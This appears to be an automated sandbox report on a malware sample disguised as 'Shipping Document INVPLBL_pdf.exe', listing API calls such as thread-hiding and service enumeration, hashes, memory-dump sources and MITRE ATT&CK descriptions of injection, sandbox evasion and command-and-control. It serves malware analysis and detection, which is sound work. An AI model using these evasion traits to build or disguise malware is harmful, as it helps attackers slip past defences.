Instruction ID: c7f078a0cfdf0b215631ca05959c9f7775583198219763ffe162c5b74d2cc645
Opcode Fuzzy Hash: b0e45467e8de5498b3c4ac8fed5e0e96917f89dc44cfc72396d078d625d1294e
Instruction Fuzzy Hash: 292126743403169AEB50BAB88CC97AF3BA5BF99764F700A26FD56D72C1D760C8808752

Uniqueness

Uniqueness Score: -1.00%

Function 00568664, Relevance: 1.6, APIs: 1, Instructions: 125nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: 936b0c5883025a63d8a1cf6ec0344c796f44ff949c4fb89ff72cd939e5f1f05b
Instruction ID: 58674b118eec295f1e86197239ff8b96235f4e3a3f7a5200c9322644ea9c1748
Opcode Fuzzy Hash: 936b0c5883025a63d8a1cf6ec0344c796f44ff949c4fb89ff72cd939e5f1f05b
Instruction Fuzzy Hash: 1E41F3302463058EFB296E24C9657B63FA1BF51320FB94B6ACD429B190EF758CC4D722

Uniqueness

Uniqueness Score: -1.00%

Function 005687AC, Relevance: 1.6, APIs: 1, Instructions: 107nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: ff303cb95fcd6b5dc7bb897b50e993d9af5a88caf94b28a884efcef466495317
Instruction ID: ac36c1fea06ac1ce9beb4c8282d1d4ffc04e4f70166fb7b35f7bf7ceba2bcf0a
Opcode Fuzzy Hash: ff303cb95fcd6b5dc7bb897b50e993d9af5a88caf94b28a884efcef466495317
Instruction Fuzzy Hash: 6431C4306467058EFF286A24C4697B63FA1BF11321FA95B5ACD829B190EF74CCC4D762

Uniqueness

Uniqueness Score: -1.00%

Function 005687F8, Relevance: 1.6, APIs: 1, Instructions: 105nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: 00f67fdd78e44c19b6029d067ad0ef766952da56e16712319c4a80890adabb93
Instruction ID: 51a98985fd43d30be1d14a6daac618a87e503867e0dc4ad85807fdd13696fa28
Opcode Fuzzy Hash: 00f67fdd78e44c19b6029d067ad0ef766952da56e16712319c4a80890adabb93
Instruction Fuzzy Hash: 9731E7306467058EFF286A24C4697B63FA1BF11321FA95B5ACD829B190EF74CCC4D762

Uniqueness

Uniqueness Score: -1.00%

Function 00568840, Relevance: 1.6, APIs: 1, Instructions: 103nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: 156951aa6e7c34933b7c530e6350a89d3f2f95db807e53976dc3e8605d000c49
Instruction ID: 46700d8112fa8decc3223df42790d9995052670302a28c438e10f1bcbfd8d2a9
Opcode Fuzzy Hash: 156951aa6e7c34933b7c530e6350a89d3f2f95db807e53976dc3e8605d000c49
Instruction Fuzzy Hash: 7031D5306562058EFF285A24C4557B63F91BF11321FA95B5ACD429B190EF74CCC4D762

Uniqueness

Uniqueness Score: -1.00%

Function 0056886F, Relevance: 1.6, APIs: 1, Instructions: 102nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: de177ce9c83bfb5dd6cc4a2d6863d85ccac5d16ba74ba1e5c6de1fe7ae7a5282
Instruction ID: 6742516de531779fdadc2cbf79f9398e965bff78664bb0eb8094a252d0f89050
Opcode Fuzzy Hash: de177ce9c83bfb5dd6cc4a2d6863d85ccac5d16ba74ba1e5c6de1fe7ae7a5282
Instruction Fuzzy Hash: 7131D5306456058EFB285A24C4697B63F91BF11321FA95B6ACD428B190EFB4CCC4D762

Uniqueness

Uniqueness Score: -1.00%

Function 005688C8, Relevance: 1.6, APIs: 1, Instructions: 94nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: c12d61bbbf2fabf4662c89d480960f7b5d738347a37ac10cf23606976b397990
Instruction ID: 58c79e8dfe89a0019e80234a58dbf37afa32efca94723f078cbb0437bcab4a5c
Opcode Fuzzy Hash: c12d61bbbf2fabf4662c89d480960f7b5d738347a37ac10cf23606976b397990
Instruction Fuzzy Hash: 6E31C3306463058EFB285A24C4697B63F91BF12321FA9575ACD428B190EFB4CCC4D762

Uniqueness

Uniqueness Score: -1.00%

Function 00568910, Relevance: 1.6, APIs: 1, Instructions: 94serviceCOMMON

Download Yara Rule

APIs

EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumServicesStatus
String ID:
API String ID: 1175134041-0
Opcode ID: 971e708b988d5f43d2c5d8e88d4920a3aa6c5405b9cb22c4a5a2284a04ce3f02
Instruction ID: 73bb729e2034f8fcd96a1b5d90dff62ae59e64038896197fa779a1536cc6333d
Opcode Fuzzy Hash: 971e708b988d5f43d2c5d8e88d4920a3aa6c5405b9cb22c4a5a2284a04ce3f02
Instruction Fuzzy Hash: 8131C3306522058EFB286E24C4997B63F91BF12321FA9575ACD428F190EFB4CCC4DB62

Uniqueness

Uniqueness Score: -1.00%

Function 005689B0, Relevance: 1.6, APIs: 1, Instructions: 86nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: 34bcad99d6e4df8d5f25087dca356fe843a9e0b374d8d10cbf7278d4331fccb8
Instruction ID: b127e083f40c6201dce68dbe7a58428355d6e3ecc96609cf22253d7edd0c2897
Opcode Fuzzy Hash: 34bcad99d6e4df8d5f25087dca356fe843a9e0b374d8d10cbf7278d4331fccb8
Instruction Fuzzy Hash: A82103306523058EFB296A20C8697B63F91BF52321F69576ACD468F0A1EFB4CCC4D761

Uniqueness

Uniqueness Score: -1.00%

Function 00568A00, Relevance: 1.6, APIs: 1, Instructions: 82nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID:
API String ID: 2214395652-0
Opcode ID: a70a949dbbd3505bf15315f72e4718b3b42365535410290888c5fa420ecdb370
Instruction ID: 0461ffb106364335ac2e2e7a6eae30f5887b8160276f85e68bb0b3680a0214b9
Opcode Fuzzy Hash: a70a949dbbd3505bf15315f72e4718b3b42365535410290888c5fa420ecdb370
Instruction Fuzzy Hash: 6021C4306163058EFB296E24C4697B63FA1BF12321F69575AC8458F0A1EFB4CCC4C721

Uniqueness

Uniqueness Score: -1.00%

Function 005608D3, Relevance: 1.6, APIs: 1, Instructions: 71nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: bc5e855818514ff941967bd9044bd3b164126d3c6ee2386d3b241e9fc6aab6ea
Instruction ID: 52cbf3168fbeeb732a3ca29d5e6c242eec948ffb258daa59f7b021921fc15c4d
Opcode Fuzzy Hash: bc5e855818514ff941967bd9044bd3b164126d3c6ee2386d3b241e9fc6aab6ea
Instruction Fuzzy Hash: 891126756003158FEF50AEB88CC979E3BB5BF88364F640A2AF956976C2D620C8C1C642

Uniqueness

Uniqueness Score: -1.00%

Function 00568B78, Relevance: 1.6, APIs: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumServicesStatus
String ID:
API String ID: 1175134041-0
Opcode ID: d3563366a4586dc5dedc66c515dae9fa24374231f45c9b41b9ccbd8cb67e4a1b
Instruction ID: 8320725014b3b0091d2fb514a90f33ff30742d4bb23e8101d143411c0f880324
Opcode Fuzzy Hash: d3563366a4586dc5dedc66c515dae9fa24374231f45c9b41b9ccbd8cb67e4a1b
Instruction Fuzzy Hash: 181180306523158DFB28AE24D1597763BA1BF11315F5A9759C9458F061EFB1CCC4C721

Uniqueness

Uniqueness Score: -1.00%

Function 00568BA6, Relevance: 1.6, APIs: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumServicesStatus
String ID:
API String ID: 1175134041-0
Opcode ID: f4bcfcc463c248b55c4d6e4c36f6f63eb6347aeddad843e00011d81fb0fd1949
Instruction ID: 91e6327ce0b74f72119f3fb056547fc97d49ca7b674157abb85364c8119aec7e
Opcode Fuzzy Hash: f4bcfcc463c248b55c4d6e4c36f6f63eb6347aeddad843e00011d81fb0fd1949
Instruction Fuzzy Hash: 0B1180306123058DFB286E24D1593B63BA1BF51311F999769C9858F061FBB1CCC4C721

Uniqueness

Uniqueness Score: -1.00%

Function 00568C48, Relevance: 1.5, APIs: 1, Instructions: 28serviceCOMMON

Download Yara Rule

APIs

EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumServicesStatus
String ID:
API String ID: 1175134041-0
Opcode ID: 5b496790c8193ab51c035f5d66d01b28a1a27aa6bbe9880ac4f207b836340879
Instruction ID: bdb46185974075523c9b696555bae09d42e56fd3eb9719e26af8095632268ec0
Opcode Fuzzy Hash: 5b496790c8193ab51c035f5d66d01b28a1a27aa6bbe9880ac4f207b836340879
Instruction Fuzzy Hash: 39E06D343526568DEB2DBA38D4A53B63F63BD537003AC4799C9818F160FB228C84C321

Uniqueness

Uniqueness Score: -1.00%

Function 00568117, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00567B99,00000040,00563245,00000000,00000000,00000000,00000000,?,00000000,00000000,00566938), ref: 00568130

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 00564580, Relevance: 1.6, APIs: 1, Instructions: 111nativethreadnetworkCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,00000004,?,000000FF), ref: 00564670

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationInternetOpenThread
String ID:
API String ID: 2828803125-0
Opcode ID: 6311fd4e9ab7820cc8af5f63b48226cffe8db6fdced74a29826f9c533d9956bb
Instruction ID: 338dbe0422349d0a6c60a6b0ae2049fe8d326dd7015377b2c80f797e751b6b63
Opcode Fuzzy Hash: 6311fd4e9ab7820cc8af5f63b48226cffe8db6fdced74a29826f9c533d9956bb
Instruction Fuzzy Hash: D83134302403879FEF315E28CC54BFA3BA6AF52390F944121ED89AB1C1E7719885DA11

Uniqueness

Uniqueness Score: -1.00%

Function 00566784, Relevance: 1.5, APIs: 1, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,005603F7,00000000), ref: 00566846

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 73d3b30230a6a35d13920c53f2565d04909f95207cc0e8977da5fc8dcfc54f5d
Instruction ID: 897a8fa7c4be8f133fd747f96fd4c19af9843dc3519cdf3818c1fb2e3cf91e5c
Opcode Fuzzy Hash: 73d3b30230a6a35d13920c53f2565d04909f95207cc0e8977da5fc8dcfc54f5d
Instruction Fuzzy Hash: D4F0E99475164A7EDF303B759C89BDE2EF9AF95761F94420AFC10D70858B148CC846D3

Uniqueness

Uniqueness Score: -1.00%

Function 0056065B, Relevance: 1.5, APIs: 1, Instructions: 39nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(005606F0,?,00000000,?,?,?,?,?,?,?,00560375), ref: 005606CD
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: ef4e2a5bfcf85be934b0c82ce39c4cc9f1f96e5e942ea3a13efc8f3147381314
Instruction ID: dbd855b07829f8a200db8338c2508a25329d41b0a288cf228ce66a29033b07e4
Opcode Fuzzy Hash: ef4e2a5bfcf85be934b0c82ce39c4cc9f1f96e5e942ea3a13efc8f3147381314
Instruction Fuzzy Hash: 28F0F6395052015FCB50DE24C89579B37A1FF86324F60190DEC9A9B1C1CB3188C6CB09

Uniqueness

Uniqueness Score: -1.00%

Function 005606C4, Relevance: 1.5, APIs: 1, Instructions: 25nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(005606F0,?,00000000,?,?,?,?,?,?,?,00560375), ref: 005606CD
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 107c8b3396cdd0aba5839a98c48210050f0afc305b2b2e6bfa1787959393e50e
Instruction ID: 156a30151567cdab71305e4c9d65cd8c006bf9b182d0419176abebdde80a4090
Opcode Fuzzy Hash: 107c8b3396cdd0aba5839a98c48210050f0afc305b2b2e6bfa1787959393e50e
Instruction Fuzzy Hash: 3DE0863D6057025FDE509A2498557D777A0FF8A325F602A18DCBADB3C0DB35D89ACA04

Uniqueness

Uniqueness Score: -1.00%

Function 00566814, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,005603F7,00000000), ref: 00566846

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 83d324819f8541d6709a4b11c7452a0a0edd113038e0b6b6760aff33afe9278c
Instruction ID: 2bf888557d2ae4a87924a60f2903cae5f32b97db468d5dd25a93c2fee714efd1
Opcode Fuzzy Hash: 83d324819f8541d6709a4b11c7452a0a0edd113038e0b6b6760aff33afe9278c
Instruction Fuzzy Hash: 88E0866575160A6BDF206B76E899FCE3F61AF81351B988102BC504B114CB3448498B93

Uniqueness

Uniqueness Score: -1.00%

Function 00566741, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,005603F7,00000000), ref: 00566846

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fe318d119f75dce9cb4f4a96631544f6a9fbf6662013cadb6f7604e37171d968
Instruction ID: 8ed0a0d44b3cd88e5f608febdfab2cf48a40a98256bff1d85cf679e8164f596b
Opcode Fuzzy Hash: fe318d119f75dce9cb4f4a96631544f6a9fbf6662013cadb6f7604e37171d968
Instruction Fuzzy Hash: B0C08C445920162EDF302B305D48ADF1F94AE45BB1FA84718F811C30D007108D80C122

Uniqueness

Uniqueness Score: -1.00%

Function 00564E5C, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00564E71

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8760f5aa671b34cbe224284ceb99b87aa1748194995db2046d65a1cd79bbe32e
Instruction ID: b88935c484bbddcc34ea8b479c18a56e12e643a4f679d2ad8afe5daf294f42a4
Opcode Fuzzy Hash: 8760f5aa671b34cbe224284ceb99b87aa1748194995db2046d65a1cd79bbe32e
Instruction Fuzzy Hash: 78B02BB00411480DEBA0D3314848641270C2B5038077DC09CC0080660BCF00437467D2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Shipping Document INVPLBL_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: Shipping Document INVPLBL_pdf.exe PID: 7072 Parent PID: 5852

General

Chronological Activities

Function 004060FE, Relevance: 10.9, APIs: 1, Strings: 6, Instructions: 402
memoryCOMMONCrypto

Function 00406201, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 381
memoryCOMMONCrypto

Function 0040604C, Relevance: 1.7, APIs: 1, Instructions: 429
memoryCOMMONCrypto

Function 0040609A, Relevance: 1.7, APIs: 1, Instructions: 416
memoryCOMMONCrypto

Function 00406432, Relevance: 1.6, APIs: 1, Instructions: 398
COMMONCrypto

Function 00406141, Relevance: 1.6, APIs: 1, Instructions: 391
memoryCOMMONCrypto

Function 00406261, Relevance: 1.6, APIs: 1, Instructions: 383
memoryCOMMONCrypto

Function 004061E0, Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMONCrypto

Function 0040617C, Relevance: 1.6, APIs: 1, Instructions: 380
memoryCOMMONCrypto

Function 00406317, Relevance: 1.6, APIs: 1, Instructions: 380
memoryCOMMONCrypto

Function 004063A8, Relevance: 1.6, APIs: 1, Instructions: 366
memoryCOMMONCrypto